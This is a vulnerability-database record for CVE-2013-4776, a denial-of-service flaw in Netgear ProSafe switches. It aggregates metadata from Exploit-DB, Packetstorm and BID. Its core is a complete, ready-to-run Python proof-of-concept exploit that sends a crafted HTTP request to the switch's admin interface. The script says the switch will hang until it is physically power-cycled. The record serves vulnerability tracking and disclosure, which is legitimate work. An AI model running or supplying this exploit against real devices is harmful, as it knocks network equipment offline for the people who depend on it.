ID

VAR-E-201308-0137


CVE

cve_id:CVE-2013-4776

Trust: 2.4

cve_id:CVE-2013-4775

Trust: 2.0

sources: BID: 61924 // BID: 61918 // PACKETSTORM: 122905 // EXPLOIT-DB: 27775 // EDBNET: 20983 // EDBNET: 20984 // EDBNET: 49628

EDB ID

27775


TITLE

Netgear ProSafe - Denial of Service - Hardware dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 27775

DESCRIPTION

Netgear ProSafe - Denial of Service. CVE-2013-4776CVE-96477 . dos exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 27775

AFFECTED PRODUCTS

vendor:netgearmodel:prosafescope: - version: -

Trust: 3.3

sources: PACKETSTORM: 122905 // EXPLOIT-DB: 27775 // EDBNET: 20983 // EDBNET: 20984 // EDBNET: 49628

EXPLOIT

#!/usr/bin/python

################################################################
# #
# Netgear ProSafe - CVE-2013-4776 PoC #
# written by Juan J. Guelfo @ Encripto AS #
# post@encripto.no #
# #
# Copyright 2013 Encripto AS. All rights reserved. #
# #
# This software is licensed under the FreeBSD license. #
# http://www.encripto.no/tools/license.php #
# #
################################################################

import sys, getopt, urllib2
from subprocess import *

__version__ = "0.1"
__author__ = "Juan J. Guelfo, Encripto AS (post@encripto.no)"

# Prints title and other header info
def header():
print ""
print " ================================================================= "
print "| Netgear ProSafe - CVE-2013-4776 PoC \t\t\t\t |".format(__version__)
print "| by {0}\t\t |".format(__author__)
print " ================================================================= "
print ""


# Prints help
def help():
header()
print """
Usage: python CVE-2013-4776.py [mandatory options]

Mandatory options:
-t target ...Target IP address
-p port ...Port where the HTTP admin interface is listening on

Example:
python CVE-2013-4776.py -t 192.168.0.1 -p 80
"""
sys.exit(0)


if __name__ == '__main__':

#Parse options
try:
options, args = getopt.getopt(sys.argv[1:], "t:p:", ["target=", "port="])

except getopt.GetoptError, err:
header()
print "\n[-] Error: {0}.\n".format(str(err))
sys.exit(1)

if not options:
help()

target = None
port = None
for opt, arg in options:
if opt in ("-t"):
target = arg

if opt in ("-p"):
port = arg

#Option input validation
if not target or not port:
help()
print "[-] Error: Incorrect syntax.\n"
sys.exit(1)

header()
headers = { "User-Agent" : "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)" }

try:
# Get the startup config via HTTP admin interface
print "[+] Triggering DoS condition..."
r = urllib2.Request('http://%s:%s/filesystem/' % (target, port), None, headers)
urllib2.urlopen(r,"",5).read()

except urllib2.URLError:
print "[-] Error: The connection could not be established.\n"

except:
print "[+] The switch should be freaking out..."
print "[+] Reboot the switch (unplug the power cord) to get it back to normal...\n"

sys.exit(0)

Trust: 1.0

sources: EXPLOIT-DB: 27775

EXPLOIT LANGUAGE

py

Trust: 0.6

sources: EXPLOIT-DB: 27775

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 27775

TYPE

Denial of Service Vulnerability

Trust: 1.2

sources: EDBNET: 20984 // EDBNET: 49628

TAGS

tag:exploit

Trust: 0.5

tag:denial of service

Trust: 0.5

tag:vulnerability

Trust: 0.5

tag:proof of concept

Trust: 0.5

tag:info disclosure

Trust: 0.5

sources: PACKETSTORM: 122905

CREDITS

Juan J. Guelfo

Trust: 0.6

sources: EXPLOIT-DB: 27775

EXTERNAL IDS

db:NVDid:CVE-2013-4776

Trust: 2.4

db:NVDid:CVE-2013-4775

Trust: 2.0

db:EXPLOIT-DBid:27775

Trust: 1.6

db:0DAYTODAYid:21149

Trust: 0.6

db:EDBNETid:20983

Trust: 0.6

db:0DAYTODAYid:21150

Trust: 0.6

db:EDBNETid:20984

Trust: 0.6

db:EDBNETid:49628

Trust: 0.6

db:PACKETSTORMid:122905

Trust: 0.5

db:BIDid:61924

Trust: 0.3

db:BIDid:61918

Trust: 0.3

sources: BID: 61924 // BID: 61918 // PACKETSTORM: 122905 // EXPLOIT-DB: 27775 // EDBNET: 20983 // EDBNET: 20984 // EDBNET: 49628

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2013-4776

Trust: 2.1

url:https://nvd.nist.gov/vuln/detail/cve-2013-4775

Trust: 1.7

url:http://www.netgear.com

Trust: 0.6

url:https://0day.today/exploits/21149

Trust: 0.6

url:https://0day.today/exploits/21150

Trust: 0.6

url:https://www.exploit-db.com/exploits/27775/

Trust: 0.6

sources: BID: 61924 // BID: 61918 // PACKETSTORM: 122905 // EXPLOIT-DB: 27775 // EDBNET: 20983 // EDBNET: 20984 // EDBNET: 49628

SOURCES

db:BIDid:61924
db:BIDid:61918
db:PACKETSTORMid:122905
db:EXPLOIT-DBid:27775
db:EDBNETid:20983
db:EDBNETid:20984
db:EDBNETid:49628

LAST UPDATE DATE

2022-07-27T09:40:26.597000+00:00


SOURCES UPDATE DATE

db:BIDid:61924date:2013-08-21T00:00:00
db:BIDid:61918date:2013-08-21T00:00:00

SOURCES RELEASE DATE

db:BIDid:61924date:2013-08-21T00:00:00
db:BIDid:61918date:2013-08-21T00:00:00
db:PACKETSTORMid:122905date:2013-08-22T02:13:52
db:EXPLOIT-DBid:27775date:2013-08-22T00:00:00
db:EDBNETid:20983date:2013-08-22T00:00:00
db:EDBNETid:20984date:2013-08-22T00:00:00
db:EDBNETid:49628date:2013-08-22T00:00:00